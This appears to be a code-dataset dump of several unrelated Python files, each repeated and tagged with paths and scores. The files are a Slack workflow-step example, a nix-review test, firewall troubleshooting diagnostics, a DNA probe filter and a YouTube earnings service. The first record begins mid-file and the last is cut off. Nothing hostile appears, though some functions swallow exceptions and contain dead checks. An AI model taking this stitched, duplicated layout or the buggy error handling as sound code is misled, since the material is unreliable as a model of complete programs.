# export SLACK_BOT_TOKEN=xoxb-***
app = AsyncApp()
# https://api.slack.com/tutorials/workflow-builder-steps
@app.action({"type": "workflow_step_edit", "callback_id": "copy_review"})
async def edit(body: dict, ack: AsyncAck, client: AsyncWebClient):
await ack()
new_modal: AsyncSlackResponse = await client.views_open(
trigger_id=body["trigger_id"],
view={
"type": "workflow_step",
"callback_id": "copy_review_view",
"blocks": [
{
"type": "section",
"block_id": "intro-section",
"text": {
"type": "plain_text",
"text": "Create a task in one of the listed projects. The link to the task and other details will be available as variable data in later steps.",
},
},
{
"type": "input",
"block_id": "task_name_input",
"element": {
"type": "plain_text_input",
"action_id": "task_name",
"placeholder": {
"type": "plain_text",
"text": "Write a task name",
},
},
"label": {"type": "plain_text", "text": "Task name"},
},
{
"type": "input",
"block_id": "task_description_input",
"element": {
"type": "plain_text_input",
"action_id": "task_description",
"placeholder": {
"type": "plain_text",
"text": "Write a description for your task",
},
},
"label": {"type": "plain_text", "text": "Task description"},
},
{
"type": "input",
"block_id": "task_author_input",
"element": {
"type": "plain_text_input",
"action_id": "task_author",
"placeholder": {
"type": "plain_text",
"text": "Write a task name",
},
},
"label": {"type": "plain_text", "text": "Task author"},
},
],
},
)
@app.view("copy_review_view")
async def save(ack: AsyncAck, client: AsyncWebClient, body: dict):
state_values = body["view"]["state"]["values"]
response: AsyncSlackResponse = await client.api_call(
api_method="workflows.updateStep",
json={
"workflow_step_edit_id": body["workflow_step"]["workflow_step_edit_id"],
"inputs": {
"taskName": {
"value": state_values["task_name_input"]["task_name"]["value"],
},
"taskDescription": {
"value": state_values["task_description_input"]["task_description"][
"value"
],
},
"taskAuthorEmail": {
"value": state_values["task_author_input"]["task_author"]["value"],
},
},
"outputs": [
{
"name": "taskName",
"type": "text",
"label": "Task Name",
},
{
"name": "taskDescription",
"type": "text",
"label": "Task Description",
},
{
"name": "taskAuthorEmail",
"type": "text",
"label": "Task Author Email",
},
],
},
)
await ack()
pseudo_database = {}
@app.event("workflow_step_execute")
async def execute(body: dict, client: AsyncWebClient):
step = body["event"]["workflow_step"]
completion: AsyncSlackResponse = await client.api_call(
api_method="workflows.stepCompleted",
json={
"workflow_step_execute_id": step["workflow_step_execute_id"],
"outputs": {
"taskName": step["inputs"]["taskName"]["value"],
"taskDescription": step["inputs"]["taskDescription"]["value"],
"taskAuthorEmail": step["inputs"]["taskAuthorEmail"]["value"],
},
},
)
user: AsyncSlackResponse = await client.users_lookupByEmail(
email=step["inputs"]["taskAuthorEmail"]["value"]
)
user_id = user["user"]["id"]
new_task = {
"task_name": step["inputs"]["taskName"]["value"],
"task_description": step["inputs"]["taskDescription"]["value"],
}
tasks = pseudo_database.get(user_id, [])
tasks.append(new_task)
pseudo_database[user_id] = tasks
blocks = []
for task in tasks:
blocks.append(
{
"type": "section",
"text": {"type": "plain_text", "text": task["task_name"]},
}
)
blocks.append({"type": "divider"})
home_tab_update: AsyncSlackResponse = await client.views_publish(
user_id=user_id,
view={
"type": "home",
"title": {"type": "plain_text", "text": "Your tasks!"},
"blocks": blocks,
},
)
if __name__ == "__main__":
app.start(3000) # POST http://localhost:3000/slack/events | examples/workflow_steps/async_steps_from_apps_primitive.py | import sys
sys.path.insert(1, "../..")
# ------------------------------------------------
import logging
from slack_sdk.web.async_client import AsyncSlackResponse, AsyncWebClient
from slack_bolt.async_app import AsyncApp, AsyncAck
logging.basicConfig(level=logging.DEBUG)
# export SLACK_SIGNING_SECRET=***
# export SLACK_BOT_TOKEN=xoxb-***
app = AsyncApp()
# https://api.slack.com/tutorials/workflow-builder-steps
@app.action({"type": "workflow_step_edit", "callback_id": "copy_review"})
async def edit(body: dict, ack: AsyncAck, client: AsyncWebClient):
await ack()
new_modal: AsyncSlackResponse = await client.views_open(
trigger_id=body["trigger_id"],
view={
"type": "workflow_step",
"callback_id": "copy_review_view",
"blocks": [
{
"type": "section",
"block_id": "intro-section",
"text": {
"type": "plain_text",
"text": "Create a task in one of the listed projects. The link to the task and other details will be available as variable data in later steps.",
},
},
{
"type": "input",
"block_id": "task_name_input",
"element": {
"type": "plain_text_input",
"action_id": "task_name",
"placeholder": {
"type": "plain_text",
"text": "Write a task name",
},
},
"label": {"type": "plain_text", "text": "Task name"},
},
{
"type": "input",
"block_id": "task_description_input",
"element": {
"type": "plain_text_input",
"action_id": "task_description",
"placeholder": {
"type": "plain_text",
"text": "Write a description for your task",
},
},
"label": {"type": "plain_text", "text": "Task description"},
},
{
"type": "input",
"block_id": "task_author_input",
"element": {
"type": "plain_text_input",
"action_id": "task_author",
"placeholder": {
"type": "plain_text",
"text": "Write a task name",
},
},
"label": {"type": "plain_text", "text": "Task author"},
},
],
},
)
@app.view("copy_review_view")
async def save(ack: AsyncAck, client: AsyncWebClient, body: dict):
state_values = body["view"]["state"]["values"]
response: AsyncSlackResponse = await client.api_call(
api_method="workflows.updateStep",
json={
"workflow_step_edit_id": body["workflow_step"]["workflow_step_edit_id"],
"inputs": {
"taskName": {
"value": state_values["task_name_input"]["task_name"]["value"],
},
"taskDescription": {
"value": state_values["task_description_input"]["task_description"][
"value"
],
},
"taskAuthorEmail": {
"value": state_values["task_author_input"]["task_author"]["value"],
},
},
"outputs": [
{
"name": "taskName",
"type": "text",
"label": "Task Name",
},
{
"name": "taskDescription",
"type": "text",
"label": "Task Description",
},
{
"name": "taskAuthorEmail",
"type": "text",
"label": "Task Author Email",
},
],
},
)
await ack()
pseudo_database = {}
@app.event("workflow_step_execute")
async def execute(body: dict, client: AsyncWebClient):
step = body["event"]["workflow_step"]
completion: AsyncSlackResponse = await client.api_call(
api_method="workflows.stepCompleted",
json={
"workflow_step_execute_id": step["workflow_step_execute_id"],
"outputs": {
"taskName": step["inputs"]["taskName"]["value"],
"taskDescription": step["inputs"]["taskDescription"]["value"],
"taskAuthorEmail": step["inputs"]["taskAuthorEmail"]["value"],
},
},
)
user: AsyncSlackResponse = await client.users_lookupByEmail(
email=step["inputs"]["taskAuthorEmail"]["value"]
)
user_id = user["user"]["id"]
new_task = {
"task_name": step["inputs"]["taskName"]["value"],
"task_description": step["inputs"]["taskDescription"]["value"],
}
tasks = pseudo_database.get(user_id, [])
tasks.append(new_task)
pseudo_database[user_id] = tasks
blocks = []
for task in tasks:
blocks.append(
{
"type": "section",
"text": {"type": "plain_text", "text": task["task_name"]},
}
)
blocks.append({"type": "divider"})
home_tab_update: AsyncSlackResponse = await client.views_publish(
user_id=user_id,
view={
"type": "home",
"title": {"type": "plain_text", "text": "Your tasks!"},
"blocks": blocks,
},
)
if __name__ == "__main__":
app.start(3000) # POST http://localhost:3000/slack/events | 0.374791 | 0.284793 |
import unittest
from typing import Any, List, Tuple
from unittest.mock import MagicMock, mock_open, patch
from nix_review.cli import main
from .cli_mocks import (
CliTestCase,
IgnoreArgument,
Mock,
MockCompletedProcess,
build_cmds,
read_asset,
)
def borg_eval_cmds() -> List[Tuple[Any, Any]]:
return [
(IgnoreArgument, mock_open(read_data=read_asset("github-pull-37200.json"))()),
(
IgnoreArgument,
mock_open(read_data=read_asset("github-pull-37200-statuses.json"))(),
),
(
"https://gist.githubusercontent.com/GrahamcOfBorg/4c9ebc3e608308c6096202375b0dc902/raw/",
read_asset("gist-37200.txt").encode("utf-8").split(b"\n"),
),
(
[
"git",
"fetch",
"--force",
"https://github.com/NixOS/nixpkgs",
"master:refs/nix-review/0",
"pull/37200/head:refs/nix-review/1",
],
MockCompletedProcess(),
),
(
["git", "rev-parse", "--verify", "refs/nix-review/0"],
MockCompletedProcess(stdout=b"hash1\n"),
),
(
["git", "rev-parse", "--verify", "refs/nix-review/1"],
MockCompletedProcess(stdout=b"hash2\n"),
),
(["git", "worktree", "add", IgnoreArgument, "hash1"], MockCompletedProcess()),
(["git", "merge", "--no-commit", "hash2"], MockCompletedProcess()),
(
["nix", "eval", "--raw", "nixpkgs.system"],
MockCompletedProcess(stdout=b"x86_64-linux"),
),
]
class PrCommandTestCase(CliTestCase):
@patch("urllib.request.urlopen")
@patch("subprocess.run")
def test_pr_command_borg_eval(
self, mock_run: MagicMock, mock_urlopen: MagicMock
) -> None:
effects = Mock(self, borg_eval_cmds() + build_cmds)
mock_run.side_effect = effects
mock_urlopen.side_effect = effects
main(
"nix-review",
[
"pr",
"--build-args",
'--builders "ssh://joerg@10.243.29.170 aarch64-linux"',
"37200",
],
)
if __name__ == "__main__":
unittest.main(failfast=True) | nix_review/tests/test_pr_borg_eval.py | import unittest
from typing import Any, List, Tuple
from unittest.mock import MagicMock, mock_open, patch
from nix_review.cli import main
from .cli_mocks import (
CliTestCase,
IgnoreArgument,
Mock,
MockCompletedProcess,
build_cmds,
read_asset,
)
def borg_eval_cmds() -> List[Tuple[Any, Any]]:
return [
(IgnoreArgument, mock_open(read_data=read_asset("github-pull-37200.json"))()),
(
IgnoreArgument,
mock_open(read_data=read_asset("github-pull-37200-statuses.json"))(),
),
(
"https://gist.githubusercontent.com/GrahamcOfBorg/4c9ebc3e608308c6096202375b0dc902/raw/",
read_asset("gist-37200.txt").encode("utf-8").split(b"\n"),
),
(
[
"git",
"fetch",
"--force",
"https://github.com/NixOS/nixpkgs",
"master:refs/nix-review/0",
"pull/37200/head:refs/nix-review/1",
],
MockCompletedProcess(),
),
(
["git", "rev-parse", "--verify", "refs/nix-review/0"],
MockCompletedProcess(stdout=b"hash1\n"),
),
(
["git", "rev-parse", "--verify", "refs/nix-review/1"],
MockCompletedProcess(stdout=b"hash2\n"),
),
(["git", "worktree", "add", IgnoreArgument, "hash1"], MockCompletedProcess()),
(["git", "merge", "--no-commit", "hash2"], MockCompletedProcess()),
(
["nix", "eval", "--raw", "nixpkgs.system"],
MockCompletedProcess(stdout=b"x86_64-linux"),
),
]
class PrCommandTestCase(CliTestCase):
@patch("urllib.request.urlopen")
@patch("subprocess.run")
def test_pr_command_borg_eval(
self, mock_run: MagicMock, mock_urlopen: MagicMock
) -> None:
effects = Mock(self, borg_eval_cmds() + build_cmds)
mock_run.side_effect = effects
mock_urlopen.side_effect = effects
main(
"nix-review",
[
"pr",
"--build-args",
'--builders "ssh://joerg@10.243.29.170 aarch64-linux"',
"37200",
],
)
if __name__ == "__main__":
unittest.main(failfast=True) | 0.672117 | 0.286543 |
from templates import diag
import os, time
import func
class diag_troubleshooting_f2f_worker(diag):
page = "Troubleshooting.F2F Worker"
title = "Debug F2F Worker Connections"
isFirewall = True
isManagement = False
isClusterXL = False
minVersion = 8020
content = ['This command enables:', 'echo 1 > /proc/cpkstats/fw_worker_[workerid]_stats', '', 'and prints the results:', 'cat /proc/cpkstats/fw_worker_[workerid]_stats', '', 'last but no least, it will disable debug:', 'echo 0 > /proc/cpkstats/fw_worker_[workerid]_stats']
isTable = False
workers = []
def change_f2f_stats(self, worker_id, val):
self.debug(3, "echo " + str(val) + " > /proc/cpkstats/fw_worker_" + str(worker_id) + "_stats")
os.system("echo " + str(val) + " > /proc/cpkstats/fw_worker_" + str(worker_id) + "_stats")
def getall_f2f_worker(self):
workers = []
for filename in os.listdir("/proc/cpkstats/"):
if "fw_worker_" in filename and "_stats" in filename and not "raw" in filename:
workers.append(int(filename.replace("fw_worker_","").replace("_stats","")))
return workers
def enable_disable(self, action = 0):
self.workers = self.getall_f2f_worker()
for worker in self.workers:
self.change_f2f_stats(worker, action)
def set_enable(self):
self.isTable = True
self.enable_disable(1)
def set_disable(self):
self.enable_disable(0)
def run_loop(self):
self.content = []
stats = []
stats_sort = []
self.content.append([ "Worker", "Type", "Cycles", "Time ago", "Proto", "Source", "SPORT", "Destination", "DPORT" ])
for worker in self.workers:
for line in func.tail_and_head('/proc/cpkstats/fw_worker_' + str(worker) + '_stats', 18, 16):
raw = str(line).replace('\t','').replace('\n','')
raw = raw.split()
s_worker = worker
s_type = raw[0].replace(':','')
s_cycles = int(raw[1])
s_timeago = int(raw[2])
raw = raw[3:]
s_data = ' '.join(raw)
new = { 'worker': s_worker, 'type': s_type, 'cycles': s_cycles, 'timeago': s_timeago, 'data': s_data }
stats.append(new)
stats_sort = sorted(stats, key=lambda k: k['cycles'], reverse=True)
for s in stats_sort:
if "," in s["data"]:
data = s["data"].replace("<","").replace(">","").split(",")
if len(data) > 4:
proto = str(data[5]).strip()
if proto == "1":
proto = "ICMP"
if proto == "6":
proto = "TCP"
if proto == "17":
proto = "UDP"
src = data[1].strip()
src_p = data[2].strip()
dst = data[3].strip()
dst_p = data[4].strip()
self.content.append([ str(s["worker"]), str(s["type"]), str(s["cycles"]), str(s["timeago"]), proto, src, src_p, dst, dst_p ])
class diag_troubleshooting_clusterxl_state(diag):
page = "Troubleshooting.ClusterXL State"
title = "Show ClusterXL State"
isFirewall = True
isManagement = False
isClusterXL = True
minVersion = 8020
content = [ 'Starting Output...' ]
isDebugCommand = False
isTable = False
def run_loop(self):
out, err = func.execute_command('cphaprob state ; echo ; cphaprob -a if')
self.content = out.read().split('\n')
class diag_troubleshooting_throughput(diag):
page = "Troubleshooting.Throughput"
title = "Show troughput"
isFirewall = True
isManagement = True
minVersion = 8020
content = ["Please wait, while starting Output..."]
isDebugCommand = False
isTable = False
last_rx_bytes = {}
last_tx_bytes = {}
rx_bytes = {}
tx_bytes = {}
rx_sum = {}
tx_sum = {}
ipaddr = {}
nics = []
def run_loop(self):
showme = True
# grab all active nics
if len(self.nics) < 1:
out, err = func.execute_command('ifconfig | grep HWaddr')
for data in out.read().split('\n'):
if "Ethernet" in data:
raw = data.split()
nic = raw[0].strip()
self.nics.append(nic)
# grab ip address from interface
if len(self.ipaddr) < 1:
for nic in self.nics:
if nic not in self.ipaddr:
ipa = "0.0.0.0"
out, err = func.execute_command('ifconfig ' + nic + ' | grep "inet addr"')
data = out.read()
if data != "":
data = data.split(':')[1]
ipa = data.split(' ')[0]
self.ipaddr[nic] = ipa
# grab rx and tx bytes
for nic in self.nics:
out, err = func.execute_command('cat /sys/class/net/' + nic + '/statistics/rx_bytes')
data = out.read()
if nic not in self.last_rx_bytes:
showme = False
else:
self.rx_bytes[nic] = int(data.strip()) - int(self.last_rx_bytes[nic])
self.last_rx_bytes[nic] = int(data.strip())
out, err = func.execute_command('cat /sys/class/net/' + nic + '/statistics/tx_bytes')
data = out.read()
if nic not in self.last_tx_bytes:
showme = False
else:
self.tx_bytes[nic] = int(data.strip()) - int(self.last_tx_bytes[nic])
self.last_tx_bytes[nic] = int(data.strip())
# grab rx and tx sum bytes
for nic in self.nics:
out, err = func.execute_command('ifconfig ' + nic + ' | grep byte')
data = out.read()
data = data.split(':')
self.rx_sum[nic] = data[1].split()[1][1:] + " " + data[1].split()[2][:-1]
self.tx_sum[nic] = data[2].split()[1][1:] + " " + data[2].split()[2][:-1]
if showme:
self.isTable = True
self.content = []
self.content.append([ "Interface" , "IP-Address" , "RX Rate", "TX Rate", "RX Sum", "TX Sum" ])
for nic in self.nics:
nic_rx_r_txt = ""
nic_tx_r_txt = ""
nic_ip = self.ipaddr[nic]
nic_rx_r = self.rx_bytes[nic] * 8
if nic_rx_r > (1024*1024) and nic_rx_r_txt == "":
nic_rx_r_txt = str(round(nic_rx_r/(1024*1024))) + " MBit"
if nic_rx_r > (1024) and nic_rx_r_txt == "":
nic_rx_r_txt = str(round(nic_rx_r/(1024))) + " KBit"
if nic_rx_r <= (1024) and nic_rx_r_txt == "":
nic_rx_r_txt = str(round(nic_rx_r)) + " Bit"
nic_tx_r = self.tx_bytes[nic] * 8
if nic_tx_r > (1024*1024) and nic_tx_r_txt == "":
nic_tx_r_txt = str(round(nic_tx_r/(1024*1024))) + " MBit"
if nic_tx_r > (1024) and nic_tx_r_txt == "":
nic_tx_r_txt = str(round(nic_tx_r/(1024))) + " KBit"
if nic_tx_r <= (1024) and nic_tx_r_txt == "":
nic_tx_r_txt = str(round(nic_tx_r)) + " Bit"
nic_rx_s = str(self.rx_sum[nic])
nic_tx_s = str(self.tx_sum[nic])
self.content.append([ nic , nic_ip, nic_rx_r_txt, nic_tx_r_txt, nic_rx_s, nic_tx_s ]) | troubleshooting.py |
from templates import diag
import os, time
import func
class diag_troubleshooting_f2f_worker(diag):
page = "Troubleshooting.F2F Worker"
title = "Debug F2F Worker Connections"
isFirewall = True
isManagement = False
isClusterXL = False
minVersion = 8020
content = ['This command enables:', 'echo 1 > /proc/cpkstats/fw_worker_[workerid]_stats', '', 'and prints the results:', 'cat /proc/cpkstats/fw_worker_[workerid]_stats', '', 'last but no least, it will disable debug:', 'echo 0 > /proc/cpkstats/fw_worker_[workerid]_stats']
isTable = False
workers = []
def change_f2f_stats(self, worker_id, val):
self.debug(3, "echo " + str(val) + " > /proc/cpkstats/fw_worker_" + str(worker_id) + "_stats")
os.system("echo " + str(val) + " > /proc/cpkstats/fw_worker_" + str(worker_id) + "_stats")
def getall_f2f_worker(self):
workers = []
for filename in os.listdir("/proc/cpkstats/"):
if "fw_worker_" in filename and "_stats" in filename and not "raw" in filename:
workers.append(int(filename.replace("fw_worker_","").replace("_stats","")))
return workers
def enable_disable(self, action = 0):
self.workers = self.getall_f2f_worker()
for worker in self.workers:
self.change_f2f_stats(worker, action)
def set_enable(self):
self.isTable = True
self.enable_disable(1)
def set_disable(self):
self.enable_disable(0)
def run_loop(self):
self.content = []
stats = []
stats_sort = []
self.content.append([ "Worker", "Type", "Cycles", "Time ago", "Proto", "Source", "SPORT", "Destination", "DPORT" ])
for worker in self.workers:
for line in func.tail_and_head('/proc/cpkstats/fw_worker_' + str(worker) + '_stats', 18, 16):
raw = str(line).replace('\t','').replace('\n','')
raw = raw.split()
s_worker = worker
s_type = raw[0].replace(':','')
s_cycles = int(raw[1])
s_timeago = int(raw[2])
raw = raw[3:]
s_data = ' '.join(raw)
new = { 'worker': s_worker, 'type': s_type, 'cycles': s_cycles, 'timeago': s_timeago, 'data': s_data }
stats.append(new)
stats_sort = sorted(stats, key=lambda k: k['cycles'], reverse=True)
for s in stats_sort:
if "," in s["data"]:
data = s["data"].replace("<","").replace(">","").split(",")
if len(data) > 4:
proto = str(data[5]).strip()
if proto == "1":
proto = "ICMP"
if proto == "6":
proto = "TCP"
if proto == "17":
proto = "UDP"
src = data[1].strip()
src_p = data[2].strip()
dst = data[3].strip()
dst_p = data[4].strip()
self.content.append([ str(s["worker"]), str(s["type"]), str(s["cycles"]), str(s["timeago"]), proto, src, src_p, dst, dst_p ])
class diag_troubleshooting_clusterxl_state(diag):
page = "Troubleshooting.ClusterXL State"
title = "Show ClusterXL State"
isFirewall = True
isManagement = False
isClusterXL = True
minVersion = 8020
content = [ 'Starting Output...' ]
isDebugCommand = False
isTable = False
def run_loop(self):
out, err = func.execute_command('cphaprob state ; echo ; cphaprob -a if')
self.content = out.read().split('\n')
class diag_troubleshooting_throughput(diag):
page = "Troubleshooting.Throughput"
title = "Show troughput"
isFirewall = True
isManagement = True
minVersion = 8020
content = ["Please wait, while starting Output..."]
isDebugCommand = False
isTable = False
last_rx_bytes = {}
last_tx_bytes = {}
rx_bytes = {}
tx_bytes = {}
rx_sum = {}
tx_sum = {}
ipaddr = {}
nics = []
def run_loop(self):
showme = True
# grab all active nics
if len(self.nics) < 1:
out, err = func.execute_command('ifconfig | grep HWaddr')
for data in out.read().split('\n'):
if "Ethernet" in data:
raw = data.split()
nic = raw[0].strip()
self.nics.append(nic)
# grab ip address from interface
if len(self.ipaddr) < 1:
for nic in self.nics:
if nic not in self.ipaddr:
ipa = "0.0.0.0"
out, err = func.execute_command('ifconfig ' + nic + ' | grep "inet addr"')
data = out.read()
if data != "":
data = data.split(':')[1]
ipa = data.split(' ')[0]
self.ipaddr[nic] = ipa
# grab rx and tx bytes
for nic in self.nics:
out, err = func.execute_command('cat /sys/class/net/' + nic + '/statistics/rx_bytes')
data = out.read()
if nic not in self.last_rx_bytes:
showme = False
else:
self.rx_bytes[nic] = int(data.strip()) - int(self.last_rx_bytes[nic])
self.last_rx_bytes[nic] = int(data.strip())
out, err = func.execute_command('cat /sys/class/net/' + nic + '/statistics/tx_bytes')
data = out.read()
if nic not in self.last_tx_bytes:
showme = False
else:
self.tx_bytes[nic] = int(data.strip()) - int(self.last_tx_bytes[nic])
self.last_tx_bytes[nic] = int(data.strip())
# grab rx and tx sum bytes
for nic in self.nics:
out, err = func.execute_command('ifconfig ' + nic + ' | grep byte')
data = out.read()
data = data.split(':')
self.rx_sum[nic] = data[1].split()[1][1:] + " " + data[1].split()[2][:-1]
self.tx_sum[nic] = data[2].split()[1][1:] + " " + data[2].split()[2][:-1]
if showme:
self.isTable = True
self.content = []
self.content.append([ "Interface" , "IP-Address" , "RX Rate", "TX Rate", "RX Sum", "TX Sum" ])
for nic in self.nics:
nic_rx_r_txt = ""
nic_tx_r_txt = ""
nic_ip = self.ipaddr[nic]
nic_rx_r = self.rx_bytes[nic] * 8
if nic_rx_r > (1024*1024) and nic_rx_r_txt == "":
nic_rx_r_txt = str(round(nic_rx_r/(1024*1024))) + " MBit"
if nic_rx_r > (1024) and nic_rx_r_txt == "":
nic_rx_r_txt = str(round(nic_rx_r/(1024))) + " KBit"
if nic_rx_r <= (1024) and nic_rx_r_txt == "":
nic_rx_r_txt = str(round(nic_rx_r)) + " Bit"
nic_tx_r = self.tx_bytes[nic] * 8
if nic_tx_r > (1024*1024) and nic_tx_r_txt == "":
nic_tx_r_txt = str(round(nic_tx_r/(1024*1024))) + " MBit"
if nic_tx_r > (1024) and nic_tx_r_txt == "":
nic_tx_r_txt = str(round(nic_tx_r/(1024))) + " KBit"
if nic_tx_r <= (1024) and nic_tx_r_txt == "":
nic_tx_r_txt = str(round(nic_tx_r)) + " Bit"
nic_rx_s = str(self.rx_sum[nic])
nic_tx_s = str(self.tx_sum[nic])
self.content.append([ nic , nic_ip, nic_rx_r_txt, nic_tx_r_txt, nic_rx_s, nic_tx_s ]) | 0.137605 | 0.122156 |
import random
from catch.filter.base_filter import BaseFilter
from catch import probe
__author__ = '<NAME> <<EMAIL>>'
class NExpansionFilter(BaseFilter):
"""Filter that expands 'N' bases within probes.
"""
def __init__(self, limit_n_expansion_randomly=3):
"""
Args:
limit_n_expansion_randomly: when set to a nonnegative integer,
only this number of 'N' bases are expanded, and they
are randomly chosen; the rest of are replaced with
random unambiguous bases. When None, all 'N' bases
are expanded
"""
self.limit_n_expansion_randomly = limit_n_expansion_randomly
def _filter(self, input):
"""Return input probes where 'N' bases are replaced with real bases.
"""
real_bases = ['A', 'T', 'C', 'G']
output = []
for p in input:
num_n = p.seq_str.count('N')
if num_n == 0:
# p has no 'N' bases, so there is nothing to expand
output += [p]
continue
p_seq_init = p.seq_str
if (self.limit_n_expansion_randomly is not None and
num_n > self.limit_n_expansion_randomly):
# Randomly replace (num_n - self.limit_n_expansion_randomly)
# 'N' bases with random unambiguous bases
occurrences = [i for i, base in enumerate(p_seq_init)
if base == 'N']
p_seq_init_list = list(p_seq_init)
while len(occurrences) > self.limit_n_expansion_randomly:
occ_to_replace = random.choice(occurrences)
replacement = random.choice(real_bases)
p_seq_init_list[occ_to_replace] = replacement
occurrences.remove(occ_to_replace)
p_seq_init = ''.join(p_seq_init_list)
expanded_probe_seqs = [p_seq_init]
# Keep iterating (expanding) while there are still 'N'
# bases left
while [s for s in expanded_probe_seqs if 'N' in s]:
expanded_probe_seqs_updated = []
for s in expanded_probe_seqs:
N_pos = s.index('N')
if N_pos == -1:
# There is no need to expand s because there is no 'N'
expanded_probe_seqs_updated += [s]
continue
# Expand the first 'N' in s (at position N_pos)
s_list = list(s)
for b in real_bases:
s_list[N_pos] = b
expanded_probe_seqs_updated += [''.join(s_list)]
expanded_probe_seqs = expanded_probe_seqs_updated
for seq in expanded_probe_seqs:
output += [probe.Probe.from_str(seq)]
return output | catch/filter/n_expansion_filter.py | import random
from catch.filter.base_filter import BaseFilter
from catch import probe
__author__ = '<NAME> <<EMAIL>>'
class NExpansionFilter(BaseFilter):
"""Filter that expands 'N' bases within probes.
"""
def __init__(self, limit_n_expansion_randomly=3):
"""
Args:
limit_n_expansion_randomly: when set to a nonnegative integer,
only this number of 'N' bases are expanded, and they
are randomly chosen; the rest of are replaced with
random unambiguous bases. When None, all 'N' bases
are expanded
"""
self.limit_n_expansion_randomly = limit_n_expansion_randomly
def _filter(self, input):
"""Return input probes where 'N' bases are replaced with real bases.
"""
real_bases = ['A', 'T', 'C', 'G']
output = []
for p in input:
num_n = p.seq_str.count('N')
if num_n == 0:
# p has no 'N' bases, so there is nothing to expand
output += [p]
continue
p_seq_init = p.seq_str
if (self.limit_n_expansion_randomly is not None and
num_n > self.limit_n_expansion_randomly):
# Randomly replace (num_n - self.limit_n_expansion_randomly)
# 'N' bases with random unambiguous bases
occurrences = [i for i, base in enumerate(p_seq_init)
if base == 'N']
p_seq_init_list = list(p_seq_init)
while len(occurrences) > self.limit_n_expansion_randomly:
occ_to_replace = random.choice(occurrences)
replacement = random.choice(real_bases)
p_seq_init_list[occ_to_replace] = replacement
occurrences.remove(occ_to_replace)
p_seq_init = ''.join(p_seq_init_list)
expanded_probe_seqs = [p_seq_init]
# Keep iterating (expanding) while there are still 'N'
# bases left
while [s for s in expanded_probe_seqs if 'N' in s]:
expanded_probe_seqs_updated = []
for s in expanded_probe_seqs:
N_pos = s.index('N')
if N_pos == -1:
# There is no need to expand s because there is no 'N'
expanded_probe_seqs_updated += [s]
continue
# Expand the first 'N' in s (at position N_pos)
s_list = list(s)
for b in real_bases:
s_list[N_pos] = b
expanded_probe_seqs_updated += [''.join(s_list)]
expanded_probe_seqs = expanded_probe_seqs_updated
for seq in expanded_probe_seqs:
output += [probe.Probe.from_str(seq)]
return output | 0.458106 | 0.175786 |
from app import db
from flask import current_app, g
from app.youtube_money_calculator.models import Channel, Video
from googleapiclient.discovery import build
class ChannelService:
def fetch(channel_id):
try:
youtube = get_youtube_service()
response = youtube\
.channels()\
.list(part="snippet,contentDetails,statistics",
id=channel_id)\
.execute()
snippet = response["items"][0]["snippet"]
contentDetails = response["items"][0]["contentDetails"]
statistics = response["items"][0]["statistics"]
except Exception as e: # TODO
print(e)
fetched_data = {
"channel_id": channel_id,
"title": snippet["title"],
"subscriber_count": statistics["subscriberCount"],
"view_count": statistics["viewCount"],
"video_count": statistics["videoCount"],
"icon_url_default": snippet["thumbnails"]["default"]["url"],
"icon_url_medium": snippet["thumbnails"]["medium"]["url"],
"icon_url_high": snippet["thumbnails"]["high"]["url"],
"uploads": contentDetails["relatedPlaylists"]["uploads"],
"money": float(statistics["viewCount"]) * 0.002 # TODO
}
return fetched_data
def get(channel_id):
channel = Channel.query.get(channel_id)
if not channel:
fetched_data = ChannelService.fetch(channel_id)
channel = Channel(**fetched_data)
db.session.add(channel)
db.session.commit()
return channel
class PlayListService:
def search(playlist_id):
next_page_token = None
video_ids = set()
while True:
youtube = get_youtube_service()
try:
response = youtube\
.playlistItems()\
.list(
part='contentDetails',
playlistId=playlist_id,
pageToken=next_page_token)\
.execute()
for item in response['items']:
video_ids.add(item['contentDetails']['videoId'])
except Exception as e: # TODO
print(e)
if 'nextPageToken' in response:
next_page_token = response['nextPageToken']
else:
break
return video_ids
class VideoService:
def fetch(video_id):
try:
youtube = get_youtube_service()
response = youtube\
.videos()\
.list(part="snippet,contentDetails,statistics",
id=video_id)\
.execute()
snippet = response["items"][0]["snippet"]
contentDetails = response["items"][0]["contentDetails"]
statistics = response["items"][0]["statistics"]
except Exception as e: # TODO
print(e)
fetched_data = {
"video_id": video_id,
"title": snippet["title"],
"view_count": statistics["viewCount"],
"duration": contentDetails["duration"],
"channel_id": snippet["channelId"],
"icon_url_default": snippet["thumbnails"]["default"]["url"],
"icon_url_medium": snippet["thumbnails"]["medium"]["url"],
"icon_url_high": snippet["thumbnails"]["high"]["url"],
"money": float(statistics["viewCount"]) * 0.002 # TODO
}
return fetched_data
def get(video_id):
video = Video.query.get(video_id)
if not video:
fetched_data = VideoService.fetch(video_id)
video = Video(**fetched_data)
db.session.add(video)
db.session.commit()
return video
def get_youtube_service():
if "youtube" not in g:
g.youtube = build(
current_app.config["YOUTUBE_API_SERVICE_NAME"],
current_app.config["YOUTUBE_API_VERSION"],
developerKey=current_app.config["DEVELOPER_KEY"])
return g.youtube | backend/app/youtube_money_calculator/services.py | from app import db
from flask import current_app, g
from app.youtube_money_calculator.models import Channel, Video
from googleapiclient.discovery import build
class ChannelService:
def fetch(channel_id):
try:
youtube = get_youtube_service()
response = youtube\
.channels()\
.list(part="snippet,contentDetails,statistics",
id=channel_id)\
.execute()
snippet = response["items"][0]["snippet"]
contentDetails = response["items"][0]["contentDetails"]
statistics = response["items"][0]["statistics"]
except Exception as e: # TODO
print(e)
fetched_data = {
"channel_id": channel_id,
"title": snippet["title"],
"subscriber_count": statistics["subscriberCount"],
"view_count": statistics["viewCount"],
"video_count": statistics["videoCount"],
"icon_url_default": snippet["thumbnails"]["default"]["url"],
"icon_url_medium": snippet["thumbnails"]["medium"]["url"],
"icon_url_high": snippet["thumbnails"]["high"]["url"],
"uploads": contentDetails["relatedPlaylists"]["uploads"],
"money": float(statistics["viewCount"]) * 0.002 # TODO
}
return fetched_data
def get(channel_id):
channel = Channel.query.get(channel_id)
if not channel:
fetched_data = ChannelService.fetch(channel_id)
channel = Channel(**fetched_data)
db.session.add(channel)
db.session.commit()
return channel
class PlayListService:
def search(playlist_id):
next_page_token = None
video_ids = set()
while True:
youtube = get_youtube_service()
try:
response = youtube\
.playlistItems()\
.list(
part='contentDetails',
playlistId=playlist_id,
pageToken=next_page_token)\
.execute()
for item in response['items']:
video_ids.add(item['contentDetails']['videoId'])
except Exception as e: # TODO
print(e)
if 'nextPageToken' in response:
next_page_token = response['nextPageToken']
else:
break
return video_ids
class VideoService:
def fetch(video_id):
try:
youtube = get_youtube_service()
response = youtube\
.videos()\
.list(part="snippet,contentDetails,statistics",
id=video_id)\
.execute()
